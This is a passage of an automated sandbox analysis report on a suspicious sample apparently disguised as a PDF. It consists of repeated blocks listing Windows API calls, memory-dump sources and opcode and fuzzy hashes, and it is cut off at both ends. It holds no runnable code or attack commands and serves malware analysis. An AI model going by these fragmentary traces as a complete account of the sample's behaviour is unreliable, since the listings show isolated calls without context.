                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                                          • String ID: %lu
                                                                          • API String ID: 3164766367-685833217
                                                                          • Opcode ID: 1a239c70344bfa97c3c275c6b2bc7a4052fd9063cd2521002630941a4ae92d6c
                                                                          • Instruction ID: afd56fec415a2b000895479b4f2f6b301c47a28df144d1dfd4b553c468a21e9b
                                                                          • Opcode Fuzzy Hash: 1a239c70344bfa97c3c275c6b2bc7a4052fd9063cd2521002630941a4ae92d6c
                                                                          • Instruction Fuzzy Hash: 28214130A00249AFCB10DF65DD85DEE7BF8EF49704B1040A9F909EB251DB71EA45DB61
                                                                          APIs
                                                                            • Part of subcall function 00AE7D2C: _memmove.LIBCMT ref: 00AE7D66
                                                                            • Part of subcall function 00B3A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00B3A399
                                                                            • Part of subcall function 00B3A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B3A3AC
                                                                            • Part of subcall function 00B3A37C: GetCurrentThreadId.KERNEL32 ref: 00B3A3B3
                                                                            • Part of subcall function 00B3A37C: AttachThreadInput.USER32(00000000), ref: 00B3A3BA
                                                                          • GetFocus.USER32 ref: 00B3A554
                                                                            • Part of subcall function 00B3A3C5: GetParent.USER32(?), ref: 00B3A3D3
                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00B3A59D
                                                                          • EnumChildWindows.USER32(?,00B3A615), ref: 00B3A5C5
                                                                          • __swprintf.LIBCMT ref: 00B3A5DF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                          • String ID: %s%d
                                                                          • API String ID: 1941087503-1110647743
                                                                          • Opcode ID: ef0385e5388935738956f4a4337184a798aeaf260b71b9ff749c93044f19530e
                                                                          • Instruction ID: 5b6bfa6168142791da5d3a4b6fd5ca06d6cdb920050563161b84fcb09941249e
                                                                          • Opcode Fuzzy Hash: ef0385e5388935738956f4a4337184a798aeaf260b71b9ff749c93044f19530e
                                                                          • Instruction Fuzzy Hash: 5811AF71604209ABDF10BF64EC8AFFA37B8AF48700F2440B5F948AA192CA7559458B75
                                                                          APIs
                                                                          • CharUpperBuffW.USER32(?,?), ref: 00B42048
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharUpper
                                                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                          • API String ID: 3964851224-769500911
                                                                          • Opcode ID: e896710dd04b178d483ddc0b11166a243969051f0e8fcbfd849e36628c37565f
                                                                          • Instruction ID: fbe40cdae612deef70cabbc877a89c788a378115e0f420adfc94a39915cf13b5
                                                                          • Opcode Fuzzy Hash: e896710dd04b178d483ddc0b11166a243969051f0e8fcbfd849e36628c37565f
                                                                          • Instruction Fuzzy Hash: CF1139319101199FCF00EFA4D9815AEB7F4FF26304F5085E8E855A7392EB326A06EB50
                                                                          APIs
                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B5EF1B
                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B5EF4B
                                                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00B5F07E
                                                                          • CloseHandle.KERNEL32(?), ref: 00B5F0FF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                          • String ID:
                                                                          • API String ID: 2364364464-0
                                                                          • Opcode ID: c0861e24de3c23b7f27f3c648de6e407ccb46b034dcbf89fa479578e76e244e8
                                                                          • Instruction ID: a9fbab13bff9741229de76450bcbb317e60808341128039bd938723391102156
                                                                          • Opcode Fuzzy Hash: c0861e24de3c23b7f27f3c648de6e407ccb46b034dcbf89fa479578e76e244e8
                                                                          • Instruction Fuzzy Hash: 90816FB16043019FD720EF29C986B2AB7E5EF48710F14886DF999DB292DBB0ED058B51
                                                                          APIs
                                                                            • Part of subcall function 00AE7F41: _memmove.LIBCMT ref: 00AE7F82
                                                                            • Part of subcall function 00B610A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B60038,?,?), ref: 00B610BC
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B60388
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B603C7
                                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B6040E
                                                                          • RegCloseKey.ADVAPI32(?,?), ref: 00B6043A
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00B60447
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                          • String ID:
                                                                          • API String ID: 3440857362-0
                                                                          • Opcode ID: cabb2c23103b16dafef6786bd1791534e8fd86727398c2364fcc65f935e4b89b
                                                                          • Instruction ID: c846f851292bf3601ecff966e150963381672cd6bfa6ebe90f5017908d74012f
                                                                          • Opcode Fuzzy Hash: cabb2c23103b16dafef6786bd1791534e8fd86727398c2364fcc65f935e4b89b
                                                                          • Instruction Fuzzy Hash: B6516731218245AFD704EF65D981E6FB7E8FF88304F04896DF596872A2DB74E904CB52
                                                                          APIs
                                                                            • Part of subcall function 00AE9997: __itow.LIBCMT ref: 00AE99C2
                                                                            • Part of subcall function 00AE9997: __swprintf.LIBCMT ref: 00AE9A0C
                                                                          • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B5DC3B
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B5DCBE
                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00B5DCDA
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B5DD1B
                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B5DD35
                                                                            • Part of subcall function 00AE5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B47B20,?,?,00000000), ref: 00AE5B8C
                                                                            • Part of subcall function 00AE5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B47B20,?,?,00000000,?,?), ref: 00AE5BB0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                          • String ID:
                                                                          • API String ID: 327935632-0
                                                                          • Opcode ID: e15f6714e37449ce999a58b5a70fb092829f05293e4119b6b36e3353a50e70cb
                                                                          • Instruction ID: 6797020acafb76e12e079a78e87e6c3d6ecf95f4900afd77668056551b8b78ae
                                                                          • Opcode Fuzzy Hash: e15f6714e37449ce999a58b5a70fb092829f05293e4119b6b36e3353a50e70cb
                                                                          • Instruction Fuzzy Hash: 53514935A00205DFCB10EF68C584AAEB7F4FF49311B1481A9E815AB362DB70ED45CF90
                                                                          APIs
                                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B4E88A
                                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00B4E8B3
                                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B4E8F2
                                                                            • Part of subcall function 00AE9997: __itow.LIBCMT ref: 00AE99C2
                                                                            • Part of subcall function 00AE9997: __swprintf.LIBCMT ref: 00AE9A0C
                                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B4E917
                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B4E91F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                          • String ID:
                                                                          • API String ID: 1389676194-0
                                                                          • Opcode ID: e6f9531eb3f143b45cb7ecdb21b100ca9334f00d0570957be3b53a46b1b96c26
                                                                          • Instruction ID: 2e95a3a261a1c0145d9a821767a96f67e26fdf79dab3a75d28e0f89a5a67f007
                                                                          • Opcode Fuzzy Hash: e6f9531eb3f143b45cb7ecdb21b100ca9334f00d0570957be3b53a46b1b96c26
                                                                          • Instruction Fuzzy Hash: 6F510A35A00245EFCF05EF65C9819AEBBF5FF48314B1480A9E949AB3A2DB31ED11DB50
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5099b1a8b1b46bda84eda4c344958c7fbdf517669aa0e874dafa0b4c04b4a218
                                                                          • Instruction ID: 2fb22d3cb1523ca05b60b045093cb877aaa6537bd471f0c4a9ef22de2fdf578c
                                                                          • Opcode Fuzzy Hash: 5099b1a8b1b46bda84eda4c344958c7fbdf517669aa0e874dafa0b4c04b4a218
                                                                          • Instruction Fuzzy Hash: 4541B235900104ABDB10DF28DC98FB9BBE8FB09310F1441A5E866B73E1DB78AD41DE55
                                                                          APIs
                                                                          • GetCursorPos.USER32(?), ref: 00AE2357
                                                                          • ScreenToClient.USER32(00BA67B0,?), ref: 00AE2374
                                                                          • GetAsyncKeyState.USER32(00000001), ref: 00AE2399
                                                                          • GetAsyncKeyState.USER32(00000002), ref: 00AE23A7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                          • String ID:
                                                                          • API String ID: 4210589936-0
                                                                          • Opcode ID: a09779fe503f6c2126f166f0c112dfd92ef8f2b1c879ec1dd6134f56320d03d2
                                                                          • Instruction ID: ab58e08fca7b8fd5c3fa5c55aea6935eddaff53c95b9c550040853c6fcc3abc7
                                                                          • Opcode Fuzzy Hash: a09779fe503f6c2126f166f0c112dfd92ef8f2b1c879ec1dd6134f56320d03d2
                                                                          • Instruction Fuzzy Hash: 44418E3150415AFBDF159F69C844BE9BBB8FB05320F20436AF829A62A0C774AD90DF91
                                                                          APIs
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B3695D
                                                                          • TranslateAcceleratorW.USER32(?,?,?), ref: 00B369A9
                                                                          • TranslateMessage.USER32(?), ref: 00B369D2
                                                                          • DispatchMessageW.USER32(?), ref: 00B369DC
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B369EB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                          • String ID:
                                                                          • API String ID: 2108273632-0
                                                                          • Opcode ID: 3da3e5031b56dba6ce852ffd0be1ec18658f0fdf8c686ae89892864efd3075d6
                                                                          • Instruction ID: 8abca749482a7b9912b7c7e58bcc4435181b8622ebc81368579737f2d08baaf9
                                                                          • Opcode Fuzzy Hash: 3da3e5031b56dba6ce852ffd0be1ec18658f0fdf8c686ae89892864efd3075d6
                                                                          • Instruction Fuzzy Hash: 5831E571904246BADB21CF74DC85BB67BECEB16300F2482A5E421C71A0DB74D885D790
                                                                          APIs
                                                                          • GetWindowRect.USER32(?,?), ref: 00B38F12
                                                                          • PostMessageW.USER32(?,00000201,00000001), ref: 00B38FBC
                                                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00B38FC4
                                                                          • PostMessageW.USER32(?,00000202,00000000), ref: 00B38FD2
                                                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00B38FDA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePostSleep$RectWindow
                                                                          • String ID:
                                                                          • API String ID: 3382505437-0
                                                                          • Opcode ID: aa1819a4e56e37303691b3835a64007582147734f37220e2fea185486aa474bc
                                                                          • Instruction ID: d1a69ae2a42c37ede75609c29da105fedc79f4d9f58537aa8d619e80ee305b35
                                                                          • Opcode Fuzzy Hash: aa1819a4e56e37303691b3835a64007582147734f37220e2fea185486aa474bc
                                                                          • Instruction Fuzzy Hash: 9B31E07150021AEFDF00CF68D94CAAE7BB6FB04315F204669F924EB1D0CBB49910CB91
                                                                          APIs
                                                                          • IsWindowVisible.USER32(?), ref: 00B3B6C7
                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B3B6E4
                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B3B71C
                                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00B3B742
                                                                          • _wcsstr.LIBCMT ref: 00B3B74C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                          • String ID:
                                                                          • API String ID: 3902887630-0
                                                                          • Opcode ID: 3299598ddb1cc8b5c5f0d255112dd4645dafac92d61faee1e242ffe03273ee90
                                                                          • Instruction ID: 2747b0c480f4b58001abf48848958848dae971312b8e0260a0969b3074f5002c
                                                                          • Opcode Fuzzy Hash: 3299598ddb1cc8b5c5f0d255112dd4645dafac92d61faee1e242ffe03273ee90
                                                                          • Instruction Fuzzy Hash: C5210732204204BAEB255B39EC4AE7B7BD8DF85710F2040ADF905CA1A5EF65CC4092A0
                                                                          APIs
                                                                            • Part of subcall function 00AE2612: GetWindowLongW.USER32(?,000000EB), ref: 00AE2623
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00B6B44C
                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00B6B471
                                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B6B489
                                                                          • GetSystemMetrics.USER32(00000004), ref: 00B6B4B2
                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00B51184,00000000), ref: 00B6B4D0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long$MetricsSystem
                                                                          • String ID:
                                                                          • API String ID: 2294984445-0
                                                                          • Opcode ID: 7f5704a267e931129c011b26a29b24b24cf7402de3bc978d66d5a2afdda7faf2
                                                                          • Instruction ID: 9ac40388bdcf1d9bd3ea6cd9a0d34d733a2e701f4c0c334ed571482142944c1e
                                                                          • Opcode Fuzzy Hash: 7f5704a267e931129c011b26a29b24b24cf7402de3bc978d66d5a2afdda7faf2
                                                                          • Instruction Fuzzy Hash: 8A216071514256AFCB109F389C44E6A37E4FB05720B144779F926D72E1EF389890DB90
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B39802
                                                                            • Part of subcall function 00AE7D2C: _memmove.LIBCMT ref: 00AE7D66
                                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B39834
                                                                          • __itow.LIBCMT ref: 00B3984C
                                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B39874
                                                                          • __itow.LIBCMT ref: 00B39885
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$__itow$_memmove
                                                                          • String ID:
                                                                          • API String ID: 2983881199-0
                                                                          • Opcode ID: 5cb11c68208e2760b12a209a0620253aefdb127d7e8056376f3812501a8aa664
                                                                          • Instruction ID: 0fa226f9fadd5026301607061ffe05d7e27fcde736c9f93f891e4519335fedc3
                                                                          • Opcode Fuzzy Hash: 5cb11c68208e2760b12a209a0620253aefdb127d7e8056376f3812501a8aa664
                                                                          • Instruction Fuzzy Hash: 7D21C531B00244BBDB109A65DC8AEAE7BE8EF8A750F1400A9F904DB291DAB08D41C7A1
                                                                          APIs
                                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AE134D
                                                                          • SelectObject.GDI32(?,00000000), ref: 00AE135C
                                                                          • BeginPath.GDI32(?), ref: 00AE1373
                                                                          • SelectObject.GDI32(?,00000000), ref: 00AE139C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                          • String ID:
                                                                          • API String ID: 3225163088-0
                                                                          • Opcode ID: a131847c3b908001d029bbc27369447c25539c5af05acd15460c0e841515d202
                                                                          • Instruction ID: 0b89d42393cb608581bd8ca65b81d5e85d2d74006a87ea4fdf93366104a67f2a
                                                                          • Opcode Fuzzy Hash: a131847c3b908001d029bbc27369447c25539c5af05acd15460c0e841515d202
                                                                          • Instruction Fuzzy Hash: A12160B0900256EFDB108F26EC057A97BBDFB11721F184226F8109B1E0DBB99891DB90
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _memcmp
                                                                          • String ID:
                                                                          • API String ID: 2931989736-0
                                                                          • Opcode ID: d2163d3ce5a9684874646cc4fa77f9cbf629a2a9a09df5fe0fa9f6a28731af51
                                                                          • Instruction ID: 4da7c571c91ca85e603397d853411738e6b78722d5eeacdd2cfb12f62d04f480
                                                                          • Opcode Fuzzy Hash: d2163d3ce5a9684874646cc4fa77f9cbf629a2a9a09df5fe0fa9f6a28731af51
                                                                          • Instruction Fuzzy Hash: 8D01B9726046057BD218A6645C52F7B7FDCDB213D4F1480A1FD14B6293EB61EE11A3E4
                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00B44D5C
                                                                          • __beginthreadex.LIBCMT ref: 00B44D7A
                                                                          • MessageBoxW.USER32(?,?,?,?), ref: 00B44D8F
